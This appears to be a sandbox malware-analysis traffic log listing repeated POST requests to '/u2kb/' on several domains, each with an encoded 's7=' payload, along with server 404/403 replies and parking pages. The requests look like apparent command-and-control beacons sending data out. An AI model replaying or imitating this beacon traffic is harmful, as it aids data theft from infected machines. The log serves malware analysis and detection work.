          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 35 5a 35 7a 4c 65 5a 50 61 4c 66 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR75Z5zLeZPaLfvbt5YRg).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 7e 45 72 71 76 43 53 5f 30 5a 37 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMI~ErqvCS_0Z7gPOgw6Q).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.energyservicestation.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.energyservicestation.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyservicestation.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 46 49 52 64 59 4b 38 32 4c 68 41 7a 31 6a 42 33 4d 78 4e 54 5a 6f 4c 64 69 36 69 51 50 5a 64 42 37 56 4f 57 36 76 53 4f 54 32 4c 61 66 36 66 4f 31 72 61 75 7e 68 75 74 79 65 6a 42 31 62 6f 6c 75 31 59 42 73 6e 75 4c 70 4c 6b 45 76 38 46 47 58 5a 79 74 41 6e 46 72 76 55 34 70 51 42 6e 46 56 52 68 76 52 55 43 4c 59 6d 6f 52 45 39 50 41 28 7a 37 32 68 6f 61 6e 42 61 74 51 43 34 59 39 71 5f 30 32 76 54 6a 6a 4e 41 4b 46 55 37 73 48 62 36 70 36 4c 4a 65 5a 28 51 66 4f 71 5a 31 74 50 46 49 30 53 72 65 66 77 55 32 64 6e 74 64 44 6a 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=FIRdYK82LhAz1jB3MxNTZoLdi6iQPZdB7VOW6vSOT2Laf6fO1rau~hutyejB1bolu1YBsnuLpLkEv8FGXZytAnFrvU4pQBnFVRhvRUCLYmoRE9PA(z72hoanBatQC4Y9q_02vTjjNAKFU7sHb6p6LJeZ(QfOqZ1tPFI0SrefwU2dntdDjQ).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.younrock.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.younrock.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.younrock.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 35 37 46 76 7a 66 53 6e 68 6b 4f 5f 28 4b 75 55 4d 55 59 6c 38 30 64 6c 58 73 45 77 53 69 63 55 38 56 68 69 33 71 5a 63 59 6d 44 72 4b 2d 45 35 4e 69 31 42 50 53 55 68 6c 46 68 74 36 6e 36 6e 57 64 50 4f 30 70 66 69 38 57 42 56 37 50 37 6d 61 4c 76 76 35 32 6a 39 43 31 6e 6f 49 62 36 4b 35 67 64 36 73 69 33 30 52 70 32 30 30 6f 71 58 58 74 53 6d 7e 64 34 48 50 35 69 45 72 39 46 46 6f 33 67 67 4b 70 75 79 48 6b 33 46 41 70 73 7a 62 4b 66 67 62 41 75 47 52 54 4e 32 71 37 50 4d 67 69 47 48 57 42 58 35 6a 6a 42 67 52 71 76 48 56 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=57FvzfSnhkO_(KuUMUYl80dlXsEwSicU8Vhi3qZcYmDrK-E5Ni1BPSUhlFht6n6nWdPO0pfi8WBV7P7maLvv52j9C1noIb6K5gd6si30Rp200oqXXtSm~d4HP5iEr9FFo3ggKpuyHk3FApszbKfgbAuGRTN2q7PMgiGHWBX5jjBgRqvHVA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thewildphotographer.co.ukConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thewildphotographer.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thewildphotographer.co.uk/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 6c 57 54 5a 69 48 63 31 4e 71 36 63 67 6a 71 31 4a 64 38 5a 52 4e 35 62 61 48 6c 79 46 44 35 30 69 7a 48 34 69 51 70 67 6e 64 39 74 4f 45 70 52 4e 64 78 51 36 65 46 70 74 66 47 30 45 66 4c 64 42 67 50 4b 55 51 57 68 56 6d 47 56 48 4a 41 57 68 65 50 37 75 4f 75 64 47 28 71 55 6a 43 4f 63 39 75 74 62 6d 51 7a 64 63 34 34 30 62 32 37 32 75 65 6a 56 66 43 6b 6d 61 51 45 32 66 75 55 28 58 53 79 77 79 76 78 44 77 52 31 63 2d 67 53 69 70 57 50 58 79 4d 4f 7e 58 67 34 51 4b 48 7a 43 42 4b 47 56 48 4e 35 68 5a 33 31 5a 4b 39 4b 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=klWTZiHc1Nq6cgjq1Jd8ZRN5baHlyFD50izH4iQpgnd9tOEpRNdxQ6eFptfG0EfLdBgPKUQWhVmGVHJAWheP7uOudG(qUjCOc9utbmQzdc440b272uejVfCkmaQE2fuU(XSywyvxDwR1c-gSipWPXyMO~Xg4QKHzCBKGVHN5hZ31ZK9KUA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.shapshit.xyzConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.shapshit.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.shapshit.xyz/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 56 66 52 78 77 52 51 41 62 39 68 53 34 69 67 43 61 62 55 4f 74 73 43 58 33 33 37 34 75 70 74 46 36 39 4a 35 4d 6c 6f 58 38 52 7e 61 54 43 34 79 43 55 59 6d 74 76 4f 59 54 30 43 77 77 6b 57 62 67 30 4e 56 77 59 62 34 7e 47 46 35 64 4f 36 41 56 59 74 5a 39 32 6b 78 63 42 54 62 54 50 69 76 48 63 4d 59 6b 54 72 72 78 4c 56 52 43 47 31 78 6a 77 73 31 76 30 6c 34 6d 5a 38 61 36 64 48 79 45 43 58 4a 4f 58 4a 77 4c 4a 53 48 63 44 34 34 75 70 72 76 4b 6d 79 73 73 36 28 50 45 48 45 72 57 6d 76 46 37 75 58 4e 7e 54 6f 58 4e 2d 50 33 52 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=VfRxwRQAb9hS4igCabUOtsCX3374uptF69J5MloX8R~aTC4yCUYmtvOYT0CwwkWbg0NVwYb4~GF5dO6AVYtZ92kxcBTbTPivHcMYkTrrxLVRCG1xjws1v0l4mZ8a6dHyECXJOXJwLJSHcD44uprvKmyss6(PEHErWmvF7uXN~ToXN-P3RA).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.thedivinerudraksha.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.thedivinerudraksha.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.thedivinerudraksha.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 76 6b 52 79 55 54 39 48 56 37 31 4b 53 39 69 70 58 76 6c 62 5a 2d 54 52 6a 2d 42 6f 6b 59 51 73 52 45 6b 54 6f 4b 39 64 75 5a 43 34 65 75 6b 6a 35 6a 76 55 30 52 32 72 47 74 7e 63 4f 39 70 54 28 75 4a 6c 4f 4d 47 50 6d 6e 75 76 6d 70 62 69 65 73 38 32 31 49 63 74 65 59 51 61 48 5a 57 45 65 4b 70 71 69 6d 38 45 48 68 4b 41 62 7a 64 2d 31 61 32 6d 50 56 73 46 53 57 56 71 31 73 30 72 35 4e 63 38 39 75 50 59 77 6d 71 4b 38 34 73 48 4b 63 46 38 53 75 31 48 6a 77 4f 66 4a 4d 31 36 33 67 32 6d 46 56 73 77 33 51 47 62 7e 31 69 66 7e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=vkRyUT9HV71KS9ipXvlbZ-TRj-BokYQsREkToK9duZC4eukj5jvU0R2rGt~cO9pT(uJlOMGPmnuvmpbies821IcteYQaHZWEeKpqim8EHhKAbzd-1a2mPVsFSWVq1s0r5Nc89uPYwmqK84sHKcF8Su1HjwOfJM163g2mFVsw3QGb~1if~g).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.un-object.comConnection: closeContent-Length: 184Cache-Control: no-cacheOrigin: http://www.un-object.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.un-object.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 73 37 3d 6b 54 72 45 4b 70 64 4c 49 67 35 6e 53 45 58 46 49 30 51 31 34 50 31 6a 65 47 51 39 7e 4c 69 66 52 76 67 68 61 35 32 79 77 6d 7e 62 4b 43 4f 38 32 69 72 55 51 78 72 36 28 5f 41 6e 31 32 58 39 54 56 38 71 61 54 45 52 49 35 71 74 31 7a 70 73 46 43 64 51 6a 6c 50 57 4d 47 4c 38 68 67 53 5f 36 30 6e 43 66 37 44 31 67 38 61 70 38 64 73 70 28 4e 73 43 32 4a 4b 65 65 53 56 73 76 6c 51 5a 79 6c 66 2d 64 5a 6f 34 57 4a 4d 72 76 69 63 30 64 70 42 7a 77 38 47 73 57 43 76 63 46 74 41 4e 42 34 62 52 6a 70 56 58 38 49 43 6b 66 6b 4a 6d 50 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: s7=kTrEKpdLIg5nSEXFI0Q14P1jeGQ9~LifRvgha52ywm~bKCO82irUQxr6(_An12X9TV8qaTERI5qt1zpsFCdQjlPWMGL8hgS_60nCf7D1g8ap8dsp(NsC2JKeeSVsvlQZylf-dZo4WJMrvic0dpBzw8GsWCvcFtANB4bRjpVX8ICkfkJmPA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzzJaC0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 20 Mar 2023 15:59:54 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 15:59:59 GMTContent-Type: text/htmlContent-Length: 199Connection: closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Encoding: gzipData Raw: 1f 8b 08 00 00 00 00 00 00 03 e5 8e c1 0e 82 30 10 44 ef fd 8a d5 bb 5d 34 1e 9b 26 4a 4b 6c 82 60 4c 39 70 14 a8 81 a8 10 69 91 df b7 d5 8b ff e0 de 66 f6 ed cc b2 85 c8 63 5d 9e 24 1c f4 31 85 53 b1 4f 55 0c cb 15 a2 92 3a 41 14 5a 7c 37 1b 1a 21 ca 6c c9 09 0b 9a b3 83 dc 09 2f b4 d2 a9 e4 db 68 0b d9 e0 20 19 a6 be 61 f8 35 09 c3 0f c4 f6 b9 28 c3 dd 9a ff 30 5e 11 dd 1a 18 cd 73 32 d6 99 06 8a 73 0a 38 6d 6e 15 c2 7c b1 d0 7b f6 1a 58 18 7a 70 6d 67 c1 9a f1 65 46 ea 93 ce 3e 4e f1 79 9e 69 d5 b9 60 77 b5 b1 77 d7 d0 7a 78 30 54 a1 fa 53 ea 6b c2 b3 e4 9f e7 0d 15 d1 11 fb e3 01 00 00 Data Ascii: 0D]4&JKl`L9pifc]$1SOU:AZ|7!l/h a5(0^s2s8mn|{XzpmgeF>Nyi`wwzx0TSk
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 16:00:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccept-Ranges: bytesVary: Accept-Encoding,User-AgentData Raw: 32 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 32 6b 62 2f 3f 70 4a 3d 79 30 62 4d 56 47 68 4b 33 52 26 61 6d 70 3b 73 37 3d 72 72 2b 73 4f 42 76 45 58 73 42 64 47 65 76 55 6b 5a 45 41 76 6e 69 47 57 72 4e 78 7a 43 31 59 4e 48 6d 58 69 76 72 39 32 46 51 68 52 49 49 59 73 65 64 52 68 4c 2b 59 47 61 4e 32 56 43 69 65 47 74 6a 74 4c 54 55 54 7a 55 71 78 44 58 33 57 66 37 57 6c 32 4a 49 42 48 75 30 57 57 39 76 44 6d 51 3d 3d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 77 77 77 2e 62 69 74 73 65 72 76 69 63 65 73 6c 74 64 2e 63 6f 6d 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a Data Ascii: 25d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /u2kb/?pJ=y0bMVGhK3R&amp;s7=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7Wl2JIBHu0WW9vDmQ== was not found on this server.<HR><I>www.bitservicesltd.com</I></BODY></HTML>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Mon, 20 Mar 2023 16:00:06 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:15 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 61 20 63 75 73 74 6f 6d 65 72 2e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 42 65 63 6f 6d 65 20 61 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 63 75 73 74 6f 6d 65 72 20 61 6e 64 20 62 65 6e 65 66 69 74 20 66 72 6f 6d 20 74 68 65 20 6e 75 6d 65 72 6f 75 73 20 61 64 76 61 6e 74 61 67 65 73 21 3c 62 72 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 16:00:18 GMTServer: Apache/2.4.54 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 65 30 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 70 61 72 6b 69 6e 67 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 20 72 65 67 69 73 74 65 72 65 64 20 61 74 20 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 70 61 72 6b 69 6e 67 2f 69 6d 67 2f 61 6c 6c 64 6f 6d 61 69 6e 73 5f 6c 6f 67 6f 2e 70 6e 67 22 20 61 6c 74 3d 22 61 6c 6c 64 6f 6d 61 69 6e 73 2e 68 6f 73 74 69 6e 67 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 3c 68 31 3e 54 68 65 20 64 6f 6d 61 69 6e 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 65 6e 65 72 67 79 73 65 72 76 69 63 65 73 74 61 74 69 6f 6e 2e 63 6f 6d 3c 2f 73 